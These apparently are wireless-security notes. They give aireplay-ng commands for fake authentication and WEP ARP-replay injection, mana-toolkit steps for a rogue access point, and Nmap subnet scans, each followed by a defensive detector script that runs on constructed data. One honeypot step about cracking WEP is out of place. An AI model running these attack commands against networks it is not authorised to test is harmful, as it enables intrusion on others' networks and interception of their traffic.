Fake Authentication of the Wi-Fi Card with the Access Point

1. Fake authentication
aireplay-ng --fakeauth 0 -a MAC-AP -h MAC-my-wificard mon0

2. Packet injection
– wait for an ARP packet, capture it and inject it back into the traffic. This forces the AP to generate a new ARP packet with a new IV; we capture that packet and inject it again. The process is repeated until enough IVs have been captured to crack the key.

aireplay-ng --arpreplay -b [target MAC] -h [your MAC] [interface]
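The replay step above works by re-injecting the same ARP request thousands of times in a short period, which is also its most visible signature on the air. The following detector is an added example (not part of the original notes): it reads a constructed, simplified capture log in the form "timestamp src_mac frame_type" (the format, the MAC addresses and the threshold are assumptions for this example) and flags any station whose ARP request rate in a one-second window is far above what a normal client produces.

```python
"""Flag ARP-replay style injection from a simplified capture log.

Added example, not from the original notes. The log format
"<timestamp_seconds> <src_mac> <frame_type>" is constructed for this
example; a real wireless IDS would derive the same fields from 802.11
frames captured in monitor mode.
"""
from collections import defaultdict


def parse_lines(log_text):
    """Yield (timestamp, src_mac, frame_type) tuples; skip malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            ts = float(parts[0])
        except ValueError:
            continue
        yield ts, parts[1].lower(), parts[2]


def arp_request_rates(log_text, window=1.0):
    """Return {src_mac: peak number of ARP requests in any sliding window}."""
    times = defaultdict(list)
    for ts, mac, ftype in parse_lines(log_text):
        if ftype == "arp_request":
            times[mac].append(ts)
    peaks = {}
    for mac, stamps in times.items():
        stamps.sort()
        best, start = 0, 0
        for end in range(len(stamps)):
            # Advance the window start until it fits within `window` seconds.
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        peaks[mac] = best
    return peaks


def flag_arp_replay(log_text, window=1.0, threshold=50):
    """Return the sorted MACs whose peak ARP request rate exceeds threshold.

    The threshold is an assumption: a legitimate client sends a handful of
    ARP requests per second at most, while a replay tool sends hundreds.
    """
    rates = arp_request_rates(log_text, window)
    return sorted(mac for mac, peak in rates.items() if peak > threshold)


def build_sample_log():
    """Constructed capture: one normal client and one station replaying ARP."""
    lines = []
    # Normal client: one ARP request every 10 seconds over a minute.
    for i in range(6):
        lines.append(f"{i * 10:.3f} aa:bb:cc:00:00:01 arp_request")
    # Injecting station: 300 ARP requests inside a single second.
    for i in range(300):
        lines.append(f"{30 + i / 300:.3f} de:ad:be:ef:00:01 arp_request")
    # Unrelated data frames from a third station.
    for i in range(10):
        lines.append(f"{i * 6:.3f} aa:bb:cc:00:00:02 data")
    return "\n".join(lines)


if __name__ == "__main__":
    log = build_sample_log()
    print("peak ARP requests per second:", arp_request_rates(log))
    print("flagged:", flag_arp_replay(log))
```

Run it as-is to see the injecting station flagged; in practice the input would come from a monitor-mode capture and the threshold would be tuned to the number of clients on the channel.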


Creating a Fake Access Point (Honeypot)

1. apt-get install mana-toolkit

2. use a wireless card (through USB) to broadcast the signals

3. leafpad /etc/mana-toolkit/hostapd-mana.conf

– set the configuration of the fake access point

4. leafpad /usr/share/mana-toolkit/run-mana/start-nat-simple.sh

– set upstream=eth0 (the interface that provides the upstream connection)

5. bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh

6. crack the WEP encryption by collecting enough packets to find packets with the same IV
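A fake access point of this kind shows up in two ways to anyone watching the air: it advertises a legitimate network name from a BSSID that is not one of the real APs (an "evil twin"), and, because it answers probe requests for any network name, a single BSSID appears under many different SSIDs. The following rogue-AP check is an added example (not part of the original notes or the mana-toolkit project): the allowlist, the beacon records and the BSSIDs are constructed for the example.

```python
"""Rogue access point checks over constructed beacon/probe-response records.

Added example, not from the original notes. Each observation is a dict with
the SSID and BSSID seen in a beacon or probe response; the allowlist maps an
organisation's SSIDs to the BSSIDs that are permitted to broadcast them.
"""
from collections import defaultdict

# Constructed allowlist: SSID -> set of BSSIDs that legitimately broadcast it.
AUTHORIZED = {
    "corp-wifi": {"00:11:22:33:44:01", "00:11:22:33:44:02"},
}

# Constructed observations. de:ad:be:ef:00:01 plays the fake AP.
SAMPLE_OBSERVATIONS = [
    {"ssid": "corp-wifi", "bssid": "00:11:22:33:44:01", "channel": 6},
    {"ssid": "corp-wifi", "bssid": "00:11:22:33:44:02", "channel": 11},
    {"ssid": "corp-wifi", "bssid": "DE:AD:BE:EF:00:01", "channel": 6},
    {"ssid": "home-net", "bssid": "de:ad:be:ef:00:01", "channel": 6},
    {"ssid": "airport_free", "bssid": "de:ad:be:ef:00:01", "channel": 6},
    {"ssid": "cafe", "bssid": "aa:aa:aa:aa:aa:aa", "channel": 1},
]


def evil_twins(observations, authorized=AUTHORIZED):
    """Return observations that advertise an authorized SSID from an unknown BSSID."""
    return [
        o for o in observations
        if o["ssid"] in authorized
        and o["bssid"].lower() not in authorized[o["ssid"]]
    ]


def promiscuous_responders(observations, min_ssids=3):
    """Return {bssid: sorted SSIDs} for BSSIDs seen under at least min_ssids names.

    A karma-style AP replies to probe requests for whatever network name a
    client asks for, so one radio shows up under many SSIDs. The cut-off of
    three is an assumption; tune it for environments with multi-SSID APs.
    """
    seen = defaultdict(set)
    for o in observations:
        seen[o["bssid"].lower()].add(o["ssid"])
    return {b: sorted(s) for b, s in seen.items() if len(s) >= min_ssids}


def rogue_report(observations, authorized=AUTHORIZED, min_ssids=3):
    """Combine both checks into a sorted list of suspicious BSSIDs."""
    suspects = {o["bssid"].lower() for o in evil_twins(observations, authorized)}
    suspects.update(promiscuous_responders(observations, min_ssids))
    return sorted(suspects)


if __name__ == "__main__":
    for o in evil_twins(SAMPLE_OBSERVATIONS):
        print("evil twin:", o["ssid"], "from", o["bssid"], "on channel", o["channel"])
    for bssid, ssids in promiscuous_responders(SAMPLE_OBSERVATIONS).items():
        print("answers for many SSIDs:", bssid, ssids)
    print("rogue BSSIDs:", rogue_report(SAMPLE_OBSERVATIONS))
```

The BSSID comparison is case-insensitive because capture tools differ in how they print MAC addresses; the channel is carried through only so an operator can locate the radio.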


Nmap port scan

1. Scan the 100 most common ports (Fast)

nmap -T4 -F xx.xx.xx.0/24

2. Detect OS and Services

nmap -T4 -A -v xx.xx.xx.1-254

Zenmap is the GUI for Nmap; it helps organize and visualize the scan results.
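When the scan is part of an exposure review rather than a one-off look, it is easier to run Nmap with -oX and process the XML than to read the terminal output. The following parser is an added example (not part of the original notes or of Nmap itself): it reads a constructed Nmap XML fragment, which uses the real element names Nmap emits (host, status, address, port, state, service), lists every open port on every host that is up, and compares the result with an allowlist of expected services. The addresses, ports and allowlist are constructed for the example.

```python
"""Parse Nmap -oX output and flag unexpected open ports.

Added example, not from the original notes. SAMPLE_NMAP_XML is a
constructed fragment in the structure Nmap writes with -oX; only the
elements this parser reads are included.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -A -oX - 192.0.2.1-3">
  <host>
    <status state="up"/>
    <address addr="192.0.2.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.2p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.0.2.3" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def open_ports(xml_text):
    """Return a dict per open port of every host that is up."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            # "open|filtered" (typical for UDP) is deliberately not counted as open.
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(p for p in (svc.get("product"), svc.get("version")) if p)
            results.append({
                "ip": addr,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "service": svc.get("name") if svc is not None else None,
                "product": product,
            })
    return results


def unexpected_exposure(xml_text, allowed):
    """Return sorted (ip, port) pairs that are open but not in the allowlist."""
    return sorted((r["ip"], r["port"]) for r in open_ports(xml_text)
                  if (r["ip"], r["port"]) not in allowed)


if __name__ == "__main__":
    for r in open_ports(SAMPLE_NMAP_XML):
        print(f"{r['ip']}:{r['port']}/{r['proto']} {r['service']} {r['product']}".rstrip())
    expected = {("192.0.2.1", 22), ("192.0.2.1", 80)}
    print("not in allowlist:", unexpected_exposure(SAMPLE_NMAP_XML, expected))
```

For a real run, replace SAMPLE_NMAP_XML with the contents of the file written by nmap -oX and keep the allowlist under version control so that each scan diffs against the approved baseline rather than against a person's memory.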